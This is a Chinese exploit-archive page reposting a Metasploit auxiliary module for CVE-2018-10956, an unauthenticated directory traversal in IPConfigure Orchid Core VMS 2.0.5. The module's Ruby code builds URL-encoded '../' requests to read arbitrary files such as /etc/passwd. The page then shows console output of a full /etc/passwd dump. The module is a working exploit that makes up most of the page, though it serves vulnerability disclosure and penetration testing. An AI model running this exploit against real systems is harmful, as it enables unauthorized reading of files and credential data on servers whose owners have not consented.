首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metas
来源:metasploit.com 作者:Kawa 发布时间:2018-06-28  
require 'msf/core'
 
class MetasploitModule < Msf::Auxiliary
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
            'Description'    => %q{
                Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.
 
                This module was tested against 2.0.5. This has been fixed in 2.0.6.
            },
            'Author'         => [ 'Sanjiv Kawa @kawabungah' ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2018-10956' ],
                    [ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
                    [ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
                ],
            'DisclosureDate' => 'May 7, 2018'))
 
        register_options(
            [
                OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
                OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
                OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
                Opt::RPORT(80)
            ], self.class )
    end
 
    def init_request(path)
        res = send_request_cgi({
            'method'   => 'GET',
            'uri'      => path
            })
 
        return res
    end
 
    def run
        path = normalize_uri(target_uri.path)
        res = init_request(path)
    
        if res && res.code == 200
            file = Array.new
            trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
 
 
            if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
                file = [datastore['FILE']]
            else
                file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
            end
 
            for i in 0 .. file.length - 1
                path = normalize_uri(target_uri.path) + trigger + file[i]
                res = init_request(path)
                
                if res.code == 200
                    print_good("Obtained #{datastore['FILE']}")
                    puts res.body
                    puts ""
                else
                    print_error("#{datastore['FILE']} does not exist")
                    puts res.body
                    puts ""
                end
            end
        else
            print_error("Web Server is Unresponsive")
        end
    end
end
__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options
 
Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/passwd      yes       This is the file to download
   INPUTFILE                   no        Specify a list of files to downloads
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.100.100.100  yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Orchid VMS
   VHOST                       no        HTTP server virtual host
 
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run
 
[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Audiograbber 1.83 - Local Buff
·Opencart < 3.0.2.0 - Denial of
·Pale Moon Browser < 27.9.3 - U
·Foxit Reader 9.0.1.1049 - Remo
·Nikto 2.1.6 - CSV Injection
·KVM (Nested Virtualization) -
·Soroush IM Desktop App 0.15 (b
·Quest KACE Systems Management
·rtorrent 0.9.6 - Denial of Ser
·Microsoft Internet Explorer HT
·DHCP Client - Command Injectio
·Polaris Office 2017 8.1 Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved